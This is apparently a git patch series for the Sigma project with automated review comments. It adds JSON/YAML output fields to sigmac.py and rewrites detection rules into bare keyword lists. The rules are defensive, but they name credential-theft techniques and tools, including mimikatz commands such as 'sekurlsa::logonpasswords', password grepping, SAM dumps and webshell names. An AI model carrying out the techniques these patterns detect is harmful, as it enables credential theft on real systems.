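Review bot: The comment `# Allowed fields in output` does not say what the list is matched against or why `filename` is in it, even though `filename` is not a key of a Sigma rule; that only becomes clear in the later hunk that fills `output['filename']` from the input path. A comment at the definition such as `# Rule keys that --output-fields may copy into json/yaml output; "filename" is synthesised from the input path, not read from the rule` would save the next reader that search. Since the list is only ever used for membership tests and never mutated, `ALLOWED_FIELDS = frozenset({...})` (with its uses updated) would also match the constant-style `ERR_*` names just above it.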
@@ -104,6 +109,11 @@ def set_argparser():
 argparser.add_argument("--lists", "-l", action="store_true", help="List available output target formats and configurations")
 argparser.add_argument("--config", "-c", action="append", help="Configurations with field name and index mapping for target environment. Multiple configurations are merged into one. Last config is authoritative in case of conflicts.")
 argparser.add_argument("--output", "-o", default=None, help="Output file or filename prefix (if end with a '_','/' or '\\')")
+ argparser.add_argument("--output-fields", "-of", help="""Enhance your output with additional fields from the Sigma rule (not only the converted rule itself).
+ Select the fields you want by providing their list delimited with commas (no space). Only work with the '--output-format' option and with 'json' or 'yaml' value.
+ available additional fields : title, id, status, description, author, references, fields, falsepositives, level, tags.
+ This option do not have any effect for backends that already format output : elastalert, kibana, splukxml etc. """)
+ argparser.add_argument("--output-format", "-oF", default="raw", choices=["raw", "json", "yaml"], help="Use only if you want to have JSON or YAML output (default is raw text)")
 argparser.add_argument("--output-extention", "-e", default=None, help="Extention of Output file for filename prefix use")
 argparser.add_argument("--print0", action="store_true", help="Delimit results by NUL-character")
 argparser.add_argument("--backend-option", "-O", action="append", help="Options and switches that are passed to the backend")
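Review bot: The help text for `--output-fields` lists ten field names but omits `filename`, which `allowed_fields` accepts and which the output code handles as a special case, so users can only discover it by reading the source; add `filename` to the `available additional fields :` line. The same string reads `Only work with` and `This option do not have any effect`, which should be `Only works with` and `This option does not have any effect`. The short options `-of` and `-oF` differ only in letter case and sit next to the existing one-letter `-o`, which invites mistakes on the command line; consider dropping the short forms or picking two distinct letters.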
@@ -213,6 +223,18 @@ def main():
 print("Sigma configuration parse error in %s: %s" % (conf_name, str(e)), file=sys.stderr)
 exit(ERR_CONFIG_PARSING)
+ if cmdargs.output_fields:
+ if cmdargs.output_format != "raw":
+ output_fields_rejected = [field for field in cmdargs.output_fields.split(",") if field not in allowed_fields] # Not allowed fields
+ if output_fields_rejected:
+ print("These fields are not allowed (check help for allow field list) : %s" % (", ".join(output_fields_rejected)), file=sys.stderr)
+ exit(ERR_OUTPUT_FORMAT)
+ else:
+ output_fields_filtered = [field for field in cmdargs.output_fields.split(",") if field in allowed_fields] # Keep only allowed fields
+ else:
+ print("The '--output-fields' or '-of' arguments must be use with '--output-format' or '-oF' equal to 'json' or 'yaml'", file=sys.stderr)
+ exit(ERR_OUTPUT_FORMAT)
+
 backend_options = BackendOptions(cmdargs.backend_option, cmdargs.backend_config)
 backend = backend_class(sigmaconfigs, backend_options)
@@ -240,6 +262,7 @@ def main():
 out = sys.stdout
 error = 0
+ output_array = []
 for sigmafile in get_inputs(cmdargs.inputs, cmdargs.recurse):
 logger.debug("* Processing Sigma input %s" % (sigmafile))
 try:
@@ -249,12 +272,13 @@ def main():
 f = sigmafile.open(encoding='utf-8')
 parser = SigmaCollectionParser(f, sigmaconfigs, rulefilter, sigmafile)
 results = parser.generate(backend)
- nb_result = len(list(copy.deepcopy(results))) inc_filenane = None if nb_result < 2 else 0 - newline_separator = '\0' if cmdargs.print0 else '\n' + + results = list(results) # Since results is an iterator and used twice we convert it a list
 for result in results:
 if not fileprefix == None and not inc_filenane == None: #yml action
 try:
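Review bot: Once `output_fields_rejected` is empty, the second comprehension that builds `output_fields_filtered` only reproduces `cmdargs.output_fields.split(",")`, so the split and the scan of `allowed_fields` run twice for the same result; split once into a local, `requested = cmdargs.output_fields.split(",")`, and set `output_fields_filtered = requested` in the success branch. The comment `# Keep only allowed fields` then becomes misleading, since every field has already been validated by that point. The variable is bound only on the validated path, which works here because every later use is guarded by the same `cmdargs.output_fields` test, but a one-line comment stating that dependency would help whoever touches this next. The enclosing `main()` continues outside this hunk.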
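Review bot: With `results = list(results)` now materialising the generator, the preceding `nb_result = len(list(copy.deepcopy(results)))` is a second full copy made only to count, and deep-copying a generator is the fragile part of that line; move the `list()` call above it and count the list instead, `results = list(results)` / `nb_result = len(results)` / `inc_filenane = None if nb_result < 2 else 0`. The comment on the new line could then say why the list exists: `# materialise: the results are counted here and iterated again below`. The surrounding `main()` body continues outside this hunk.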
@@ -273,8 +297,22 @@ def main():
 except (IOError, OSError) as e:
 print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr)
 exit(ERR_OUTPUT)
- print(result, file=out, end=newline_separator)
-
+ if not cmdargs.output_fields:
+ print(result, file=out, end=newline_separator)
+
+ if cmdargs.output_fields: # Handle output fields
+ output={}
+ f.seek(0)
+ docs = yaml.load_all(f, Loader=yaml.FullLoader)
+ for doc in docs:
+ for k,v in doc.items():
+ if k in output_fields_filtered:
+ output[k] = v
+ output['rule'] = [result for result in results]
+ if "filename" in output_fields_filtered:
+ output['filename'] = str(sigmafile.name)
+ output_array.append(output)
+
 if nb_result == 0: # elastalert return "results=[]" so get a error with out not def
 if not fileprefix == None and not inc_filenane == None: #yml action
 try:
@@ -293,7 +331,7 @@ def main():
 except (IOError, OSError) as e:
 print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr)
 exit(ERR_OUTPUT)
-
+
 except OSError as e:
 print("Failed to open Sigma file %s: %s" % (sigmafile, str(e)), file=sys.stderr)
 error = ERR_OPEN_SIGMA_RULE
@@ -321,7 +359,6 @@ def main():
 sys.exit(error)
 except (NotImplementedError, TypeError) as e:
 print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr)
- print("Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma", file=sys.stderr)
 if not cmdargs.ignore_backend_errors:
 error = ERR_NOT_IMPLEMENTED
 if not cmdargs.defer_abort:
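Review bot: The new `if cmdargs.output_fields:` block appears to sit inside the `for result in results:` loop (the collapsed rendering hides indentation, but it directly follows the per-result print), and it re-reads the rule file and appends an entry whose `rule` key holds every result via `[result for result in results]`; a rule file that yields N results would then produce N identical entries in `output_array` and parse the YAML N times. Either dedent the block one level so it runs once after the loop, or append one entry per iteration with `output['rule'] = result`. `yaml.load_all(f, Loader=yaml.FullLoader)` is more loader than this needs: the copied keys are plain scalars and lists, and rule files may come from third parties, so `yaml.safe_load_all(f)` is the safer choice and presumably what the rule parser itself uses — worth confirming. `f.seek(0)` also relies on the handle opened earlier in `main()` still being open, which holds only while the `f.close()` further down stays after this block; the loop and `main()` continue outside the hunk.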
@@ -343,10 +380,20 @@ def main():
 f.close()
 except:
 pass
-
 result = backend.finalize()
 if result:
 print(result, file=out)
+
+ if cmdargs.output_fields:
+ if cmdargs.output_format == 'json':
+ print(json.dumps(output_array, indent=4, ensure_ascii=False), file=out)
+ elif cmdargs.output_format == 'yaml':
+ yml = ruamel.yaml.YAML()
+ yml.explicit_start = True
+ yml.indent(mapping=2, sequence=4, offset=2)
+ print(ruamel.yaml.round_trip_dump(output_array), file=out)
+
 out.close()
 sys.exit(error)
From cbb03db2ddf098df08bfe30d37e2e0c090d42bb6 Mon Sep 17 00:00:00 2001
From: wagga40 <6437862+wagga40@users.noreply.github.com>
Date: Thu, 12 Aug 2021 15:28:45 +0200
Subject: [PATCH 0314/1367] Fix the way YAML is dumped
---
 tools/sigma/sigmac.py | 3 ---
 1 file changed, 3 deletions(-)
diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py
index 2e8863c1..77c88641 100755
--- a/tools/sigma/sigmac.py
+++ b/tools/sigma/sigmac.py
@@ -389,9 +389,6 @@ def main():
 if cmdargs.output_format == 'json':
 print(json.dumps(output_array, indent=4, ensure_ascii=False), file=out)
 elif cmdargs.output_format == 'yaml':
- yml = ruamel.yaml.YAML()
- yml.explicit_start = True
- yml.indent(mapping=2, sequence=4, offset=2)
 print(ruamel.yaml.round_trip_dump(output_array), file=out)
 out.close()
From 13a3e78184d7e626ceb2d837b0a019d850e3b9ee Mon Sep 17 00:00:00 2001
From: wagga40 <6437862+wagga40@users.noreply.github.com>
Date: Thu, 12 Aug 2021 15:54:02 +0200
Subject: [PATCH 0315/1367] Fix options : removed "raw"
---
 tools/sigma/sigmac.py | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py
index 77c88641..556b26d4 100755
--- a/tools/sigma/sigmac.py
+++ b/tools/sigma/sigmac.py
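Review bot: The structured document is emitted only `if cmdargs.output_fields:`, while the raw-text path in the earlier hunk is suppressed only under that same flag, so `--output-format json` given on its own silently falls back to raw output; either reject that combination next to the existing `--output-fields` validation or treat it as an empty field list. The `backend.finalize()` result, for any backend that returns one, is printed to the same `out` immediately before the JSON or YAML document, so the stream would no longer be one parseable document; guard it with `if result and not cmdargs.output_fields:` or fold the finalize text into `output_array`. `main()` starts outside this hunk.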
@@ -113,7 +113,7 @@ def set_argparser():
 Select the fields you want by providing their list delimited with commas (no space). Only work with the '--output-format' option and with 'json' or 'yaml' value.
 available additional fields : title, id, status, description, author, references, fields, falsepositives, level, tags.
 This option do not have any effect for backends that already format output : elastalert, kibana, splukxml etc. """)
- argparser.add_argument("--output-format", "-oF", default="raw", choices=["raw", "json", "yaml"], help="Use only if you want to have JSON or YAML output (default is raw text)")
+ argparser.add_argument("--output-format", "-oF", choices=["json", "yaml"], help="Use only if you want to have JSON or YAML output (default is raw text)")
 argparser.add_argument("--output-extention", "-e", default=None, help="Extention of Output file for filename prefix use")
 argparser.add_argument("--print0", action="store_true", help="Delimit results by NUL-character")
 argparser.add_argument("--backend-option", "-O", action="append", help="Options and switches that are passed to the backend")
@@ -224,7 +224,7 @@ def main():
 exit(ERR_CONFIG_PARSING)
 if cmdargs.output_fields:
- if cmdargs.output_format != "raw":
+ if cmdargs.output_format:
 output_fields_rejected = [field for field in cmdargs.output_fields.split(",") if field not in allowed_fields] # Not allowed fields
 if output_fields_rejected:
 print("These fields are not allowed (check help for allow field list) : %s" % (", ".join(output_fields_rejected)), file=sys.stderr)
@@ -232,7 +232,7 @@ def main():
 else:
 output_fields_filtered = [field for field in cmdargs.output_fields.split(",") if field in allowed_fields] # Keep only allowed fields
 else:
- print("The '--output-fields' or '-of' arguments must be use with '--output-format' or '-oF' equal to 'json' or 'yaml'", file=sys.stderr)
+ print("The '--output-fields' or '-of' arguments must be used with '--output-format' or '-oF' equal to 'json' or 'yaml'", file=sys.stderr)
 exit(ERR_OUTPUT_FORMAT)
 backend_options = BackendOptions(cmdargs.backend_option, cmdargs.backend_config)
From 6f05e33feb35b1c354ee192989fe437c53a1d290 Mon Sep 17 00:00:00 2001
From: Max Altgelt Date: Thu, 12 Aug 2021 14:03:18 +0200 Subject: [PATCH 0316/1367] fix: Correct incorrect message / keyword usage Correct a number of rules where message or keyword were incorrectly used as field names in events (typically windows event logs). However, neither field actually exists and as such these strings could never match. --- .../auditd/lnx_auditd_binary_padding.yml | 20 +++--- .../lnx_auditd_change_file_time_attr.yml | 9 ++- .../auditd/lnx_auditd_find_cred_in_files.yml | 11 ++- .../lnx_auditd_susp_histfile_operations.yml | 18 ++--- .../lnx_auditd_system_shutdown_reboot.yml | 30 ++++---- rules/linux/lnx_file_copy.yml | 5 +- ...in_alert_active_directory_user_control.yml | 2 +- .../builtin/win_alert_mimikatz_keywords.yml | 21 +++--- .../windows/builtin/win_av_relevant_match.yml | 46 ++++++------ .../win_hybridconnectionmgr_svc_running.yml | 12 ++-- ...in_set_oabvirtualdirectory_externalurl.yml | 11 ++- .../builtin/win_susp_msmpeng_crash.yml | 5 +- rules/windows/builtin/win_susp_sam_dump.yml | 8 +-- .../windows/builtin/win_vul_cve_2020_0688.yml | 3 +- rules/windows/other/win_defender_disabled.yml | 6 +- .../win_exchange_TransportAgent_failed.yml | 5 +- ...gon_exploitation_using_wellknown_tools.yml | 16 ++--- rules/windows/other/win_wmi_persistence.yml | 10 +-- .../powershell_alternate_powershell_hosts.yml | 5 +- .../powershell_malicious_keywords.yml | 41 ++++++----- .../powershell_suspicious_download.yml | 15 ++-- ...ershell_suspicious_invocation_specific.yml | 72 +++++++++---------- .../powershell_suspicious_keywords.yml | 23 +++--- ...shell_wsman_com_provider_no_powershell.yml | 4 +- .../win_exchange_proxylogon_oabvirtualdir.yml | 16 ++--- .../win_exchange_transportagent.yml | 2 +- .../win_susp_recon_activity.yml | 7 +- .../win_syncappvpublishingserver_exe.yml | 2 +- .../sysmon/sysmon_config_modification.yml | 3 +- 29 files changed, 199 insertions(+), 229 deletions(-) 
diff --git a/rules/linux/auditd/lnx_auditd_binary_padding.yml b/rules/linux/auditd/lnx_auditd_binary_padding.yml
index cba35757..a6df756d 100644
--- a/rules/linux/auditd/lnx_auditd_binary_padding.yml
+++ b/rules/linux/auditd/lnx_auditd_binary_padding.yml
@@ -14,19 +14,17 @@ logsource:
 product: linux
 service: auditd
 detection:
- selection1:
+ execve:
 type: 'EXECVE'
- keywords|contains|all:
- - 'truncate'
- - '-s'
- selection2:
- type: 'EXECVE'
- keywords|contains|all:
- - 'dd'
- - 'if='
+ truncate:
+ - 'truncate'
+ - '-s'
+ dd:
+ - 'dd'
+ - 'if='
 filter:
- keywords|contains: 'of='
- condition: selection1 or (selection2 and not filter)
+ - 'of='
+ condition: execve and (all of truncate or (all of dd and not filter))
 falsepositives:
 - 'Legitimate script work'
 level: high
diff --git a/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml b/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml
index 22763a8c..416448e5 100644
--- a/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml
+++ b/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml
@@ -14,17 +14,16 @@ logsource:
 product: linux
 service: auditd
 detection:
- selection1:
+ execve:
 type: 'EXECVE'
- keywords|contains: 'touch'
+ touch:
+ - 'touch'
 selection2:
- type: 'EXECVE'
- keywords|contains:
 - '-t'
 - '-acmr'
 - '-d'
 - '-r'
- condition: selection1 and selection2
+ condition: execve and touch and selection2
 falsepositives:
 - 'Unknown'
 level: medium
diff --git a/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml b/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml
index 71b90827..84ddd8ea 100644
--- a/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml
+++ b/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml
@@ -14,13 +14,12 @@ logsource:
 product: linux
 service: auditd
 detection:
- selection1:
+ execve:
 type: 'EXECVE'
- keywords|contains: 'grep'
- selection2:
- type: 'EXECVE'
- keywords|contains: 'password'
- condition: selection1 and selection2
+ passwordgrep:
+ - 'grep'
+ - 'password'
+ condition: execve and all of passwordgrep
 falsepositives:
 - 'Unknown'
 level: high
diff --git a/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml b/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml
index 453bad91..016b26e5 100644
--- a/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml
+++ b/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml
@@ -17,16 +17,16 @@ logsource:
 product: linux
 service: auditd
 detection:
- selection:
+ execve:
 type: EXECVE
- keywords|contains:
- - '.bash_history'
- - '.zsh_history'
- - '.zhistory'
- - '.history'
- - '.sh_history'
- - 'fish_history'
- condition: selection
+ history:
+ - '.bash_history'
+ - '.zsh_history'
+ - '.zhistory'
+ - '.history'
+ - '.sh_history'
+ - 'fish_history'
+ condition: execve and history
 fields:
 - a0
 - a1
diff --git a/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml b/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml
index 88c476d4..4aafb020 100644
--- a/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml
+++ b/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml
@@ -14,24 +14,20 @@ logsource:
 product: linux
 service: auditd
 detection:
- selection1:
+ execve:
 type: 'EXECVE'
- keywords|contains:
- - 'shutdown'
- - 'reboot'
- - 'halt'
- - 'poweroff'
- selection2:
- type: 'EXECVE'
- keywords|contains:
- - 'init'
- - 'telinit'
- selection3:
- type: 'EXECVE'
- keywords|contains:
- - '0'
- - '6'
- condition: selection1 or (selection2 and selection3)
+ shutdowncmd:
+ - 'shutdown'
+ - 'reboot'
+ - 'halt'
+ - 'poweroff'
+ init:
+ - 'init'
+ - 'telinit'
+ initselection:
+ - '0'
+ - '6'
+ condition: execve and (shutdowncmd or (init and initselection))
 falsepositives:
 - 'Legitimate administrative activity'
 level: informational
diff --git a/rules/linux/lnx_file_copy.yml b/rules/linux/lnx_file_copy.yml
index 2a0509c6..f48851eb 100644
--- a/rules/linux/lnx_file_copy.yml
+++ b/rules/linux/lnx_file_copy.yml
@@ -17,9 +17,8 @@ detection:
 - Sftp|contains:
 - 'sftp'
 filter:
- message|contains|all:
- - '@'
- - ':'
+ - '@'
+ - ':'
 condition: keywords and filter
 falsepositives:
 - Legitimate administration activities
diff --git a/rules/windows/builtin/win_alert_active_directory_user_control.yml b/rules/windows/builtin/win_alert_active_directory_user_control.yml
index 078f02eb..8094f413 100644
--- a/rules/windows/builtin/win_alert_active_directory_user_control.yml
+++ b/rules/windows/builtin/win_alert_active_directory_user_control.yml
@@ -17,7 +17,7 @@ detection:
 selection:
 EventID: 4704
 keywords:
- Message|contains:
+ PrivilegeList|contains:
 - 'SeEnableDelegationPrivilege'
 condition: all of them
 falsepositives:
diff --git a/rules/windows/builtin/win_alert_mimikatz_keywords.yml b/rules/windows/builtin/win_alert_mimikatz_keywords.yml
index 1280bd76..a9d26409 100644
--- a/rules/windows/builtin/win_alert_mimikatz_keywords.yml
+++ b/rules/windows/builtin/win_alert_mimikatz_keywords.yml
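Review bot: The `filter` in `lnx_file_copy.yml` loses the `|all` of the removed `message|contains|all`: a bare keyword list is OR-ed, so the filter now fires on either `@` or `:` instead of requiring both, which widens what the rule excludes and therefore changes its matches. `condition: keywords and all of filter` keeps the original AND, and is the form this same commit uses for `all of truncate` and `all of keywords` in other files.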
@@ -19,17 +19,16 @@ logsource:
 product: windows
 detection:
 keywords:
- Message|contains:
- - "mimikatz"
- - "mimilib"
- - "<3 eo.oe"
- - "eo.oe.kiwi"
- - "privilege::debug"
- - "sekurlsa::logonpasswords"
- - "lsadump::sam"
- - "mimidrv.sys"
- - " p::d "
- - " s::l "
+ - "mimikatz"
+ - "mimilib"
+ - "<3 eo.oe"
+ - "eo.oe.kiwi"
+ - "privilege::debug"
+ - "sekurlsa::logonpasswords"
+ - "lsadump::sam"
+ - "mimidrv.sys"
+ - " p::d "
+ - " s::l "
 condition: keywords
 falsepositives:
 - Naughty administrators
diff --git a/rules/windows/builtin/win_av_relevant_match.yml b/rules/windows/builtin/win_av_relevant_match.yml
index 6c1d18d5..fd321a9a 100644
--- a/rules/windows/builtin/win_av_relevant_match.yml
+++ b/rules/windows/builtin/win_av_relevant_match.yml
@@ -9,31 +9,29 @@ logsource:
 service: application
 detection:
 keywords:
- Message|contains:
- - "HTool-"
- - "Hacktool"
- - "ASP/Backdoor"
- - "JSP/Backdoor"
- - "PHP/Backdoor"
- - "Backdoor.ASP"
- - "Backdoor.JSP"
- - "Backdoor.PHP"
- - "Webshell"
- - "Portscan"
- - "Mimikatz"
- - "WinCred"
- - "PlugX"
- - "Korplug"
- - "Pwdump"
- - "Chopper"
- - "WmiExec"
- - "Xscan"
- - "Clearlog"
- - "ASPXSpy"
+ - "HTool-"
+ - "Hacktool"
+ - "ASP/Backdoor"
+ - "JSP/Backdoor"
+ - "PHP/Backdoor"
+ - "Backdoor.ASP"
+ - "Backdoor.JSP"
+ - "Backdoor.PHP"
+ - "Webshell"
+ - "Portscan"
+ - "Mimikatz"
+ - "WinCred"
+ - "PlugX"
+ - "Korplug"
+ - "Pwdump"
+ - "Chopper"
+ - "WmiExec"
+ - "Xscan"
+ - "Clearlog"
+ - "ASPXSpy"
 filter:
- Message|contains:
- - "Keygen"
- - "Crack"
+ - "Keygen"
+ - "Crack"
 condition: keywords and not filter
 falsepositives:
 - Some software piracy tools (key generators, cracks) are classified as hack tools
diff --git a/rules/windows/builtin/win_hybridconnectionmgr_svc_running.yml b/rules/windows/builtin/win_hybridconnectionmgr_svc_running.yml
index 7b0329fb..f2fb29d7 100644
--- a/rules/windows/builtin/win_hybridconnectionmgr_svc_running.yml
+++ b/rules/windows/builtin/win_hybridconnectionmgr_svc_running.yml
@@ -17,12 +17,12 @@ detection:
 - 40300
 - 40301
 - 40302
- Message|contains:
- - 'HybridConnection'
- - 'sb://'
- - 'servicebus.windows.net'
- - 'HybridConnectionManage'
- condition: selection
+ keywords:
+ - 'HybridConnection'
+ - 'sb://'
+ - 'servicebus.windows.net'
+ - 'HybridConnectionManage'
+ condition: selection and keywords
 falsepositives:
 - Legitimate use of Hybrid Connection Manager via Azure function apps.
 level: high
diff --git a/rules/windows/builtin/win_set_oabvirtualdirectory_externalurl.yml b/rules/windows/builtin/win_set_oabvirtualdirectory_externalurl.yml
index a00956da..4a728edb 100644
--- a/rules/windows/builtin/win_set_oabvirtualdirectory_externalurl.yml
+++ b/rules/windows/builtin/win_set_oabvirtualdirectory_externalurl.yml
@@ -14,12 +14,11 @@ logsource:
 service: msexchange-management
 detection:
 selection:
- Message|contains|all:
- - 'Set-OabVirtualDirectory'
- - 'ExternalUrl'
- - 'Page_Load'
- - 'script'
- condition: selection
+ - 'Set-OabVirtualDirectory'
+ - 'ExternalUrl'
+ - 'Page_Load'
+ - 'script'
+ condition: all of selection
 falsepositives:
 - Unknown
 level: high
diff --git a/rules/windows/builtin/win_susp_msmpeng_crash.yml b/rules/windows/builtin/win_susp_msmpeng_crash.yml
index 15b527e7..c320317f 100644
--- a/rules/windows/builtin/win_susp_msmpeng_crash.yml
+++ b/rules/windows/builtin/win_susp_msmpeng_crash.yml
@@ -23,9 +23,8 @@ detection:
 Source: 'Windows Error Reporting'
 EventID: 1001
 keywords:
- Message|contains:
- - 'MsMpEng.exe'
- - 'mpengine.dll'
+ - 'MsMpEng.exe'
+ - 'mpengine.dll'
 condition: 1 of selection* and keywords
 falsepositives:
 - MsMpEng.exe can crash when C:\ is full
diff --git a/rules/windows/builtin/win_susp_sam_dump.yml b/rules/windows/builtin/win_susp_sam_dump.yml
index d014cb46..27304ec9 100644
--- a/rules/windows/builtin/win_susp_sam_dump.yml
+++ b/rules/windows/builtin/win_susp_sam_dump.yml
@@ -15,10 +15,10 @@ logsource:
 detection:
 selection:
 EventID: 16
- Message|contains|all:
- - '\AppData\Local\Temp\SAM-'
- - '.dmp'
- condition: selection
+ keywords:
+ - '\AppData\Local\Temp\SAM-'
+ - '.dmp'
+ condition: selection and all of keywords
 falsepositives:
 - Penetration testing
 level: high
diff --git a/rules/windows/builtin/win_vul_cve_2020_0688.yml b/rules/windows/builtin/win_vul_cve_2020_0688.yml
index 51a0902c..0ab65759 100644
--- a/rules/windows/builtin/win_vul_cve_2020_0688.yml
+++ b/rules/windows/builtin/win_vul_cve_2020_0688.yml
@@ -20,8 +20,7 @@ detection:
 Source: MSExchange Control Panel
 Level: Error
 selection2:
- Message|contains:
- - '&__VIEWSTATE='
+ - '&__VIEWSTATE='
 condition: selection1 and selection2
 falsepositives:
 - Unknown
diff --git a/rules/windows/other/win_defender_disabled.yml b/rules/windows/other/win_defender_disabled.yml
index 0dfd079c..0cd77d6d 100644
--- a/rules/windows/other/win_defender_disabled.yml
+++ b/rules/windows/other/win_defender_disabled.yml
@@ -51,5 +51,7 @@ logsource:
 detection:
 selection3:
 EventID: 7036
- Message: 'The Windows Defender Antivirus Service service entered the stopped state'
- condition: selection3
\ No newline at end of file
+ keywords:
+ - 'Windows Defender Antivirus Service'
+ - 'stopped'
+ condition: selection3 and keywords
\ No newline at end of file
diff --git a/rules/windows/other/win_exchange_TransportAgent_failed.yml b/rules/windows/other/win_exchange_TransportAgent_failed.yml
index 9cad0aea..2a68a841 100644
--- a/rules/windows/other/win_exchange_TransportAgent_failed.yml
+++ b/rules/windows/other/win_exchange_TransportAgent_failed.yml
@@ -14,9 +14,10 @@ logsource:
 product: windows
 detection:
 selection:
- Message|contains: 'Install-TransportAgent'
 EventID: 6
- condition: selection
+ keywords:
+ - 'Install-TransportAgent'
+ condition: selection and keywords
 fields:
 - AssemblyPath
 falsepositives:
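Review bot: In `win_defender_disabled.yml` the two keywords are OR-ed, so `'stopped'` on its own satisfies the selection and every EventID 7036 service-stop event matches, whereas the removed exact `Message` value required both the service name and the stopped state; use `condition: selection3 and all of keywords`, the form `win_susp_sam_dump.yml` takes in this same commit. The `\ No newline at end of file` marker survives on both sides, so the file still ends without a final newline.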
diff --git a/rules/windows/other/win_possible_zerologon_exploitation_using_wellknown_tools.yml b/rules/windows/other/win_possible_zerologon_exploitation_using_wellknown_tools.yml
index df511823..9a8c833f 100644
--- a/rules/windows/other/win_possible_zerologon_exploitation_using_wellknown_tools.yml
+++ b/rules/windows/other/win_possible_zerologon_exploitation_using_wellknown_tools.yml
@@ -16,13 +16,11 @@ logsource:
 product: windows
 detection:
 selection:
- - EventID: '5805'
- Message|contains:
- - kali
- - mimikatz
- - EventID: '5723'
- Message|contains:
- - kali
- - mimikatz
- condition: selection
+ EventID:
+ - '5805'
+ - '5723'
+ keywords:
+ - kali
+ - mimikatz
+ condition: selection and keywords
 level: critical
diff --git a/rules/windows/other/win_wmi_persistence.yml b/rules/windows/other/win_wmi_persistence.yml
index bf8e8a0f..6a0d02d7 100644
--- a/rules/windows/other/win_wmi_persistence.yml
+++ b/rules/windows/other/win_wmi_persistence.yml
@@ -25,14 +25,14 @@ logsource:
 detection:
 wmi_filter_to_consumer_binding:
 EventID: 5861
- Message|contains:
- - 'ActiveScriptEventConsumer'
- - 'CommandLineEventConsumer'
- - 'CommandLineTemplate'
+ consumer_keywords:
+ - 'ActiveScriptEventConsumer'
+ - 'CommandLineEventConsumer'
+ - 'CommandLineTemplate'
 # - 'Binding EventFilter' # too many false positive with HP Health Driver
 wmi_filter_registration:
 EventID: 5859
- condition: (wmi_filter_to_consumer_binding) OR (wmi_filter_registration)
+ condition: (wmi_filter_to_consumer_binding and consumer_keywords) or (wmi_filter_registration)
 ---
 logsource:
 product: windows
diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml
index dcf6fb16..8eec258c 100644
--- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml
+++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml
@@ -19,10 +19,7 @@ falsepositives: level: medium detection: filter: - - ContextInfo: 'powershell.exe' - - Message: 'powershell.exe' - # Both fields contain key=value pairs where the key HostApplication is relevant but - # can't be referred directly as event field. + ContextInfo: 'powershell.exe' condition: selection and not filter --- diff --git a/rules/windows/powershell/powershell_malicious_keywords.yml b/rules/windows/powershell/powershell_malicious_keywords.yml index f46ce60b..03858d39 100644 --- a/rules/windows/powershell/powershell_malicious_keywords.yml +++ b/rules/windows/powershell/powershell_malicious_keywords.yml @@ -16,27 +16,26 @@ logsource: definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' detection: keywords: - Message|contains: - - "AdjustTokenPrivileges" - - "IMAGE_NT_OPTIONAL_HDR64_MAGIC" - - "Microsoft.Win32.UnsafeNativeMethods" - - "ReadProcessMemory.Invoke" - - "SE_PRIVILEGE_ENABLED" - - "LSA_UNICODE_STRING" - - "MiniDumpWriteDump" - - "PAGE_EXECUTE_READ" - - "SECURITY_DELEGATION" - - "TOKEN_ADJUST_PRIVILEGES" - - "TOKEN_ALL_ACCESS" - - "TOKEN_ASSIGN_PRIMARY" - - "TOKEN_DUPLICATE" - - "TOKEN_ELEVATION" - - "TOKEN_IMPERSONATE" - - "TOKEN_INFORMATION_CLASS" - - "TOKEN_PRIVILEGES" - - "TOKEN_QUERY" - - "Metasploit" - - "Mimikatz" + - "AdjustTokenPrivileges" + - "IMAGE_NT_OPTIONAL_HDR64_MAGIC" + - "Microsoft.Win32.UnsafeNativeMethods" + - "ReadProcessMemory.Invoke" + - "SE_PRIVILEGE_ENABLED" + - "LSA_UNICODE_STRING" + - "MiniDumpWriteDump" + - "PAGE_EXECUTE_READ" + - "SECURITY_DELEGATION" + - "TOKEN_ADJUST_PRIVILEGES" + - "TOKEN_ALL_ACCESS" + - "TOKEN_ASSIGN_PRIMARY" + - "TOKEN_DUPLICATE" + - "TOKEN_ELEVATION" + - "TOKEN_IMPERSONATE" + - "TOKEN_INFORMATION_CLASS" + - "TOKEN_PRIVILEGES" + - "TOKEN_QUERY" + - "Metasploit" + - "Mimikatz" condition: keywords falsepositives: - Penetration tests 
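Review bot: After dropping the `Message` alternative, the `filter` in `powershell_alternate_powershell_hosts.yml` is a single exact match `ContextInfo: 'powershell.exe'`; the comment that was removed in the same hunk says ContextInfo holds key=value pairs (HostApplication=...), so an exact comparison against `powershell.exe` is unlikely ever to be true, the filter would exclude nothing, and `selection and not filter` would fire on the legitimate host as well. The old list had the same problem, but this rewrite is the place to fix it: `ContextInfo|contains: 'powershell.exe'`. The explanation of why HostApplication cannot be referenced as a field was useful and should survive as a comment on the filter rather than be deleted. The `selection` this condition refers to is outside the hunk.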
